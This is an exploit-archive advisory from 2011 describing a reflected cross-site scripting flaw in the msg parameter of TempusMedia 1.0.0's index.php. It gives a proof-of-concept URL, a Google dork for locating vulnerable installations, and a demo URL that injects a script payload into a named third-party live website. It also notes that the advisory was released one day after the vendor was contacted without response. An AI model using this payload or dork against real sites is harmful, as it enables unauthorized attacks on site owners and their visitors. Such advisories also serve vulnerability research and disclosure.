TempusMedia (index.php) Cross-site scripting Vulnerability

# Exploit Title: TempusMedia (index.php) Cross-site scripting Vulnerability
# Date: 2011-07-08
# Author: Net.Edit0r
# Software Link: http://www.tempusmedia.com/
# Version : 1.0.0
# Tested on: ubuntu 11.04
# CVE : -

-----------------------------------------------------------------------------------------
TempusMedia (index.php) Cross-site scripting Vulnerability => XSS Vulnerability
-----------------------------------------------------------------------------------------

Author : Net.Edit0r
Date : 2011-07-08
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : [ webapps ]
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------



PoC/Exploit:
~~~~~~~~~~

~ [PoC] ~: [ index.php?msg=Xss ]

~ [PoC] ~: Http://[victim]/path-to-wp/index.php?msg=[Xss]


Dork:
~~~~~
Google : Powered By: TempusMedia


Demo URL:
~~~~~~~~~
- http://www.bonethefish.com/index.php?msg="><script>alert(100000)</script>



 Timeline:
~~~~~~~~~
- 05 - 07 - 2011 bug found.
- 07 - 07 - 2011 vendor contacted, but no response.
- 07 - 07 - 2011 Advisories release.

 Contact:
~~~~~~~~~
Net.Edit0r@att.net ~ Black.hat.tm@gmail.com

---------------------------------------------------------------------------
Greetz To :DarkCoder | Amir-MaGiC | H3x | D3adlY | _AttAcK_ |Dr.Nil0

Spical Th4nks: B3hz4d | M4Hd1 | Cru3l.b0y | Mikili | HUrr!c4nE

Web Greetz :http://Black-Hg.Org & http://mn-team.net/ & http://pentesters.ir/

[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
-------------------------------- [ EOF ] ----------------------------------